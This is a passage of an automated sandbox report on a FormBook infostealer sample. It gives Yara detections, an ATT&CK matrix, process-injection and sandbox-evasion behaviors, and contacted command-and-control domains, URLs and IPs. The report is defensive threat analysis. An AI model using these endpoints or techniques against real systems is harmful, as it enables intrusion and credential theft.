          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 562399 Sample: GV8EJooYMIgEnEk.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 10 GV8EJooYMIgEnEk.exe 3 2->10         started        process3 file4 28 C:\Users\user\...behaviorgraphV8EJooYMIgEnEk.exe.log, ASCII 10->28 dropped 54 Tries to detect virtualization through RDTSC time measurements 10->54 56 Injects a PE file into a foreign processes 10->56 14 GV8EJooYMIgEnEk.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.experiencedlawfirms.com 166.88.62.202, 49816, 80 EGIHOSTINGUS United States 17->30 32 www.totalwinerewards.com 199.59.243.200, 49817, 80 BODIS-NJUS United States 17->32 34 8 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 chkdsk.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GV8EJooYMIgEnEk.exe61%VirustotalBrowse
          GV8EJooYMIgEnEk.exe21%MetadefenderBrowse
          GV8EJooYMIgEnEk.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          GV8EJooYMIgEnEk.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL80%Avira URL Cloudsafe
          http://schemas.mi0%URL Reputationsafe
          http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL80%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.cottoneworld.com/cbgo/100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          https://parking.bodiscdn.com0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf100%Avira URL Cloudmalware
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bitconga.com
          		18.231.72.25
          		truetrue
            		unknown
            webarate.com
            		46.252.151.235
            		truetrue
              		unknown
              omnipets.store
              		34.102.136.180
              		truefalse
                		unknown
                www.totalwinerewards.com
                		199.59.243.200
                		truetrue
                  		unknown
                  www.experiencedlawfirms.com
                  		166.88.62.202
                  		truetrue
                    		unknown
                    casatowerofficial.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      www.casatowerofficial.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.webarate.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tothelaundry.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.omnipets.store
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8true
                              • Avira URL Cloud: safe
                              		unknown
                              www.cottoneworld.com/cbgo/true
                              • Avira URL Cloud: malware
                              		low
                              http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylffalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.miexplorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/?GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTheGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.tiro.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.micrexplorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comlGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.google.comchkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/cabarga.htmlNGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/cTheGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://fontfabrik.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cnGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleaseGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fonts.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sandoll.co.krGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://parking.bodiscdn.comchkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.urwpp.deDPleaseGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.zhongyicts.com.cnGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sakkal.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    46.252.151.235
                                                    		webarate.comItaly
                                                    		60087ASSUPERNOVAITtrue
                                                    166.88.62.202
                                                    		www.experiencedlawfirms.comUnited States
                                                    		18779EGIHOSTINGUStrue
                                                    18.231.72.25
                                                    		www.bitconga.comUnited States
                                                    		16509AMAZON-02UStrue
                                                    34.102.136.180
                                                    		omnipets.storeUnited States
                                                    		15169GOOGLEUSfalse
                                                    199.59.243.200
                                                    		www.totalwinerewards.comUnited States
                                                    		395082BODIS-NJUStrue

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:562399
                                                    Start date:28.01.2022
                                                    Start time:20:57:13
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 37s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:GV8EJooYMIgEnEk.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:20
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@7/1@7/5
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 20.6% (good quality ratio 18.5%)
                                                    • Quality average: 70.5%
                                                    • Quality standard deviation: 32.3%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 82
                                                    • Number of non-executed functions: 131
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 184.87.213.153
